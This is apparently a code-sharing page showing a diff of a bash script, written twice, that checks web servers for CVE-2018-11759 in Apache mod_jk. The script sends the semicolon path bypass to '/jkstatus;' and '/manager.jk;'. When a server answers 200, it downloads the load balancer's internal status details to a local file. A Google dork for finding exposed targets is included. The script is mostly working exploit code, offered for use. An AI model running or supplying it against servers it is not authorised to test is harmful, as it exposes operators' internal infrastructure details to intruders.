Jul10l1r4 · December 23, 2018 03:54
diff --git a/mod_jk-CVE-2018-11759.sh b/mod_jk-CVE-2018-11759.sh
 #!/usr/bin/env bash
 #	     CVE 2018-11759
 # Author: Julio Lira <[email protected]>
 # Colaborator: Fernando Eloi <[email protected]>
 # date: 12/07/2018 | MM/DD/YYYY
 # License: GNU GPL version 3
 # Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
 # Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
 # Google Dork: ["JK Status Manager for"] 
 # Vendor Homepage: [http://tomcat.apache.org/]
 # Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
 # Version: [0.1] 
 # Tested on: [Slackware, Debian, Red hat, Gentoo, Pentoo, *BSD, is compatible for all unix-like including Mac OS and others]
 # Dependencies: curl, which
 # CVE : [CVE-2018-11759]

 # Function for save all details of load balancer
 _save(){
 	# Verify if exists curl in machine
 	which curl > /dev/null && \
 		# ok or f'ck
 		printf '\n Dependence, curl found...\n' \
 		|| printf '\n \033[31mInstall the curl!\033[0m\n';
 	# Make a download of details and redirect for directory
 	# files_cap/
  mkdir files_cap
 	echo -e '\033[32m Starting balancing details download\033[0m'
 	cat <<- EOF > files_cap/$(printf "$1" | cut -d "/" -f 3).data
 		$(curl "$1/jkstatus;?mime=prop")
 	EOF
 	> /dev/null
 	# show msg of OK
 	printf "\n \033[32mDetails has been saved in files_cap/$(printf "$1" | cut -d "/" -f 3).data\033[0m\n"
 }
 # Function for send request
 _req(){
 	# Get status response of http and verify
 	jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus;" &3>/dev/null)
 	echo "Response: $jks no /jkstatus"
 	mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk;" &3>/dev/null)
 	echo "Response: $mjk no /manager.jk"
 	if [ $mjk != 404 ];then
 		url="$1/manager.jk;"
 		response=$mjk
 	elif [ $jks != 404 ];then
 		url="$1/jkstatus;"
 		response=$jks
 	fi
 }
 while read -p "Paster the URL -> " LINE; do
 	_req "$LINE"
 	if [ $response = 200 ];then
 		printf "\n \033[31mVulnerable\033[0m\n See: $url\n"
 		_save "$url"
 	elif [ $response = 302 ] || [ $response = 401 ];then
 		printf "\n Safe, but may suffer brute\n force attack, caution\n See: $url\n"
 	else
 		printf "\n \033[032mSafe, Congrats!\033[0m\n"
 	fi
 done
	#!/usr/bin/env bash
	# CVE 2018-11759
	# Author: Julio Lira <[email protected]>
	# Colaborator: Fernando Eloi <[email protected]>
	# date: 12/07/2018 \| MM/DD/YYYY
	# License: GNU GPL version 3
	# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
	# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
	# Google Dork: ["JK Status Manager for"]
	# Vendor Homepage: [http://tomcat.apache.org/]
	# Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
	# Version: [0.1]
	# Tested on: [Slackware, Debian, Red hat, Gentoo, Pentoo, *BSD, is compatible for all unix-like including Mac OS and others]
	# Dependencies: curl, which
	# CVE : [CVE-2018-11759]

	# Function for save all details of load balancer
	_save(){
	# Verify if exists curl in machine
	which curl > /dev/null && \
	# ok or f'ck
	printf '\n Dependence, curl found...\n' \
	\|\| printf '\n \033[31mInstall the curl!\033[0m\n';
	# Make a download of details and redirect for directory
	# files_cap/
	mkdir files_cap
	echo -e '\033[32m Starting balancing details download\033[0m'
	cat <<- EOF > files_cap/$(printf "$1" \| cut -d "/" -f 3).data
	$(curl "$1/jkstatus;?mime=prop")
	EOF
	> /dev/null
	# show msg of OK
	printf "\n \033[32mDetails has been saved in files_cap/$(printf "$1" \| cut -d "/" -f 3).data\033[0m\n"
	}
	# Function for send request
	_req(){
	# Get status response of http and verify
	jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus;" &3>/dev/null)
	echo "Response: $jks no /jkstatus"
	mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk;" &3>/dev/null)
	echo "Response: $mjk no /manager.jk"
	if [ $mjk != 404 ];then
	url="$1/manager.jk;"
	response=$mjk
	elif [ $jks != 404 ];then
	url="$1/jkstatus;"
	response=$jks
	fi
	}
	while read -p "Paster the URL -> " LINE; do
	_req "$LINE"
	if [ $response = 200 ];then
	printf "\n \033[31mVulnerable\033[0m\n See: $url\n"
	_save "$url"
	elif [ $response = 302 ] \|\| [ $response = 401 ];then
	printf "\n Safe, but may suffer brute\n force attack, caution\n See: $url\n"
	else
	printf "\n \033[032mSafe, Congrats!\033[0m\n"
	fi
	done